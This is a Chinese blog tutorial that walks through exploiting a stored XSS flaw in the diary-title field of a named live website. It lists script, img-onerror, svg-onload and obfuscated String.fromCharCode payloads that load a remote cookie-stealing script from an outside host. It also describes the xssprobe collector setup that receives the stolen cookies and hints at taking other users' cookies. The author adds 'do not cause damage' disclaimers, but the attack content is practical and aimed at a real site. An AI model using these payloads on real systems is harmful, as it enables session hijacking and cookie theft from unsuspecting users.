码迷,mamicode.com
首页 > 其他好文 > 详细

XSS漏洞实例利用

时间:2016-07-18 06:04:23      阅读:200      评论:0      收藏:0      [点我收藏+]

标签:xss   漏洞利用   


上一篇说了一下XSS的原理,相信大家对XSS的原理有了一定的了解。今天给大家分享一下XSS漏洞的实例利用。


环境:

        window 7 64位一台

        火狐浏览器就位

        外网云服务器一枚(我自己买的...)

        可XSS网站一匹

        获取Cookie的JS代码一套

        

好了,以上就是需要准备的东西,没有的外网云服务器(外网IP)的可以百度一下XSS利用的公开平台,自己研究下怎么用(我的服务器就不公开了,太渣了,只是用来做实验没法公开...)


现在我们开始一步一步的进行XSS漏洞利用


0x00  ....biubiubiu....偶遇可X的站点

(这里就把站点公开了,同学们可以自己学习测试下,请不要搞破坏,防止从 ```XSS入门到派出所```)

#需要注册一个账号,可X点位于写日记部分
http://www.vbao100.com/


0x01 开始测试是否存在可X(正常思路啊)

#经典测试代码
<script>alert(1)</script>
#猥琐版测试代码(需要在火狐插件firebug中查看隐蔽性好不易被管理员发现相对弹窗)
console.log(1)


0x02 啊啊啊...弹窗了(确定存在XSS)

在写日记的标题处插入测试代码点击预览(表(不要)发布...发布了管理员会审核)

技术分享


0x03 确定存在XSS了...可以利用了...嘿嘿嘿....

再次说一下上次说到的XSS paylaod

<script src=‘http://b.ioio.pub/xss/probe.js‘</script>

<img src=x
onerror="s=createElement(‘script‘);body.appendChild(s);s.src=‘http://
b.ioio.pub/xss/probe.js‘";>

<svg onload=s=createElement(‘script‘);body.appendChild(s);s.src=‘http://
b.ioio.pub/xss/probe.js>

<svg onload=
eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,
101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9
7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,
99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,
47,120,115,115,47,112,114,111,98,101,46,106,115)) >

当触发以上某一个标签会从远程加载JS代码,这是你可用通过修改远程的JS代码来实现不同的功能。

大家也看到上面的连接那肯定不是我的呀....来自大神的JS获取COOKIE 的代码

分享一下:

https://github.com/evilcos/xssprobe

主要包含三个文件,在这里给大家说下这三个脚本是干什么用的就不具体介绍代码含义了。

第一个:

这个脚本就是需要远程加载的JS获取Cookie的代码(可以下载一下放到自己的服务器上或XSS平台)
里面有一段需要修改的地方
http_server = "

#  这段需要修改为自己服务器的地址和接受数据的PHP文件

第二个:

这个就是上面提到的需要接受数据的PHP文件这个文件不需要修改。
其作用是将接受的数据写入到第三个文件中。

第三个:

这是就是你获取cookie后显示cookie的地方。通过第一文件获取到cookie然后传个第二个文件由第二个
文件写入到这个文件中显示出来。

0x04 开始利用了...构造利用代码

<script src=‘http://xx.xx.xx.xx/xsstest.js‘ /> (xx.xx.xx.xx就是我的云服务器)

构造好了,然后测试一下成功否....测试我自己申请的账号了....(怎么获取别人的cookie就靠你自己想了,你要私信我就告诉你....)

ok...现在看一下效果图....


技术分享

现在我们就成功获取到我自己的Cookie了....O(∩_∩)O~

(再次申明,请同学们不要搞破坏,仅供测试使用......)

本文出自 “启思·朝圣者” 博客,请务必保留此出处http://dearch.blog.51cto.com/10423918/1827201

XSS漏洞实例利用

标签:xss   漏洞利用   

原文地址:http://dearch.blog.51cto.com/10423918/1827201

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!